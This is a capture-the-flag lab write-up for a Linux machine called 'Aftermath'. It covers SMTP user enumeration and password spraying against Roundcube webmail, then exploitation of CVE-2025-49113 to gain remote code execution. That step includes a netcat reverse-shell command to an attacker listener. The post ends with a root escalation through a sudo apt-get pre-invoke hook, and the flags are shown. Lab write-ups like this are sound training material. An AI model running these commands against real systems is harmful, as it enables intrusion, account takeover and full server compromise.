Post

Linux Hacking : Aftermath

Linux Hacking : Aftermath

Objective

You have been assigned a penetration test against a Linux server in the client’s network. Your objective is to gain root access. The client has planted three flags on the system, retrieving each of these flags demonstrates impact.

Lab

Aftermath

Target IP

  • 10.1.99.107

Initial Access

Another team member pulled down a list of names and passwords from DeHashed… but are unsure if any of them are valid.

  • names.txt
  • passowrds.txt

Recon

Host Discovery

Run the NMAP against the target IP.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(packetbreakers㉿kali)-[~/aftermath]
└─$ nmap -sV -sC -Pn 10.1.99.107
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-29 12:43 +0530
Nmap scan report for 10.1.99.107
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a4:f0:03:80:46:18:04:53:47:2e:bf:8d:c1:9e:66:26 (ECDSA)
|_  256 ed:38:36:53:81:bf:c3:15:a2:22:d8:cc:49:3c:63:3d (ED25519)
25/tcp open  smtp    Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=kali
| Subject Alternative Name: DNS:kali
| Not valid before: 2026-03-02T19:39:52
|_Not valid after:  2036-02-28T19:39:52
|_smtp-commands: kali, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Home
Service Info: Host:  kali; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.95 seconds

Result -

Open PortRunning Service
22OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
25Postfix smtpd, smtp command VRFY, ETRN, STARTTLS
80Apache httpd 2.4.52

Web Enumeration

Access the IP address in the browser.

webenum.png

Result - A flash video is running, Analyze the source code, no information were found.

Directory Enumeration

Step 1 - Run the ffuf to identified any hidden directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(packetbreakers㉿kali)-[~/aftermath]
└─$ ffuf -u http://10.1.99.107/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -ac -c   

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.1.99.107/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

roundcube               [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 314ms]

Result - roundcube Webmail endpoint is identified.

Step 2 - Access the endpoint in the browser.

webmail.png

Result - login is required, try default admin:admin credential, no access.

SMTP Enumeration

NMAP output shows that VRFY command is enabled. Attacker can connect to port 25 to identified existing username.

In the initial, we have a names.txt and passwords.txt file were given.

Use smtp-user-enum tool to enumerate user.

1
https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(packetbreakers㉿kali)-[~/aftermath/smtp-user-enum-1.2]
└─$ ./smtp-user-enum.pl -M VRFY -U /home/packetbreakers/aftermath/names.txt -t 10.1.99.107
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/packetbreakers/aftermath/names.txt
Target count ............. 1
Username count ........... 499
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Mon Sep 28 23:54:08 2026 #########
10.1.99.107: maria exists
10.1.99.107: kali exists
######## Scan completed at Mon Sep 28 23:55:45 2026 #########
2 results.

499 queries in 97 seconds (5.1 queries / sec)

Result - Two user is identified, maria and kali .

Password Spraying Roundcube Webmail

Use cubeSpraying tool to brute force the password for roundcube . Remember we have given a passwords.txt , we will use this file.

1
https://github.com/robotshell/cubeSpraying
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(packetbreakers㉿kali)-[~/aftermath/cubeSpraying]
└─$ python3 cubeSpraying.py --url 'http://10.1.99.107/roundcube/' -U maria -P /home/packetbreakers/aftermath/passwords.txt --verbose
Trying maria:123456 - HTTP Status Code: 401
Trying maria:12345678 - HTTP Status Code: 401
Trying maria:qwerty - HTTP Status Code: 401
Trying maria:abc123 - HTTP Status Code: 401
Timeout while trying to log in for maria.
Trying maria:1234567 - HTTP Status Code: 401
Trying maria:letmeinLA - HTTP Status Code: 401
Trying maria:trustno1 - HTTP Status Code: 401
Timeout while trying to log in for maria.
Trying maria:12345 - HTTP Status Code: 401
Trying maria:Admin@123 - HTTP Status Code: 401
Trying maria:Admninistrator - HTTP Status Code: 401
Timeout while trying to log in for maria.
Trying maria:hello - HTTP Status Code: 401
Trying maria:Tellme@pass - HTTP Status Code: 401
Trying maria:Summer - HTTP Status Code: 401
Timeout while trying to log in for maria.
Trying maria:1qaz2wsx - HTTP Status Code: 302
*************************************************
[SUCCESS] Valid credentials found: maria:1qaz2wsx
*************************************************

Result - We get the password for user maria .

Webmail Access

Using the user maria , successfully login to the roundcube webmail .

webmaillogin.png

Result - Identified the first flag .

SSH Enumeration

Try login to ssh via user maria .

1
2
3
4
5
6
7
8
┌──(packetbreakers㉿kali)-[~/aftermath/cubeSpraying]
└─$ ssh maria@10.1.99.107      
The authenticity of host '10.1.99.107 (10.1.99.107)' can't be established.
ED25519 key fingerprint is: SHA256:R/StPRfknLFY8lHlMGCWgjb34+DNGFIAvY54xfHUHrs
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.99.107' (ED25519) to the list of known hosts.
maria@10.1.99.107: Permission denied (publickey).

Result - Permission denied, key based authentication is implemented.

Roundcube — CVE-2025-49113 (Authenticated RCE)

Identified Roundcube Webmail 1.5.9 is vulnerable to authenticated RCE.

roundcubeversion.png

Exploitation

Step 1 - Used CVE-2025-49113-exploit tool to exploitation.

1
https://github.com/hakaioffsec/CVE-2025-49113-exploit
1
2
3
4
5
6
7
8
9
┌──(packetbreakers㉿kali)-[~/aftermath/CVE-2025-49113-exploit]
└─$ php CVE-2025-49113.php 'http://10.1.99.107/roundcube/' maria 1qaz2wsx "id"
[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10509
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
[+] Gadget uploaded successfully!

Step 2 - Generating the reverse shell.

reverseshell.png

Step 3 - Use the CVE-2025-49113.php script with username maria and password.

1
2
3
4
5
6
7
8
┌──(packetbreakers㉿kali)-[~/aftermath/CVE-2025-49113-exploit]
└─$ php CVE-2025-49113.php 'http://10.1.99.107/roundcube/' maria 1qaz2wsx "busybox nc 10.200.100.191 9001 -e sh"      
[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10509
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
1
2
3
4
5
6
┌──(packetbreakers㉿kali)-[~/aftermath]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.200.100.191] from (UNKNOWN) [10.1.99.107] 57608
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Result - Exploit successfully, receive reverse connection on the netcat .

Step 4 - Stable the shell.

1
2
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@kali:/$ 

Step 5 - identified second flag .

1
2
3
4
5
6
7
8
9
www-data@kali:/$ ls
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  user  var
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  usr
www-data@kali:/$ cd usr/
www-data@kali:/usr$ ls
bin  games  include  lib  lib32  lib64  libexec  libx32  local  sbin  share  src  user.txt
www-data@kali:/usr$ cat user.txt 
flag{user_2345_cube}
www-data@kali:/usr$ 

Privilege Escalation

Step 1 - Start searching www-data for any information. Try access user maria .

1
2
3
4
5
6
www-data@kali:/$ cd home
www-data@kali:/home$ ls
kali  maria
www-data@kali:/home$ cd maria/
bash: cd: maria/: Permission denied
www-data@kali:/home$ 

Result - Permission denied.

Step 2 - Run the LinEnum.sh to identify any potential privilege escalation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@kali:/tmp$ ./LinEnum.sh                                        
./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Sep 29 09:58:11 UTC 2026                                                                                                                                 
                                                                                                                                                             

### SYSTEM ##############################################
[-] Kernel information:
Linux kali 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux
1
2
3
4
5
6
[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on kali:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on kali:
    (ALL) NOPASSWD: /usr/bin/apt-get

Step 3 - Verify the same manually sudo -l .

1
2
3
4
5
6
7
8
www-data@kali:/$ sudo -l
Matching Defaults entries for www-data on kali:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on kali:
    (ALL) NOPASSWD: /usr/bin/apt-get
www-data@kali:/$ 

Result - We can run sudo command without password.

Step 4 - Research the exploit on google.

gtfobins.png

Result - This provide privilege escalation to root via executing apt-get command using GTFOBins methods.

apt-get allows arbitrary pre-hook execution via APT::Update::Pre-Invoke. Because it runs as root through sudo, /bin/sh inherits root privileges.

Step 5 - Execute the below command.

1
2
www-data@kali:/$ sudo /usr/bin/apt-get update -o APT::Update::Pre-Invoke::="/bin/bash"
root@kali:/tmp# 

Result - Successfully get the root privilege.

Root Flag

Read the root flag.

1
2
3
root@kali:~# cat root.txt 
flag{toor_ 55000369_root}
root@kali:~# 

Visual Attack Chain

Visualattackchain.png

This post is licensed under CC BY 4.0 by the author.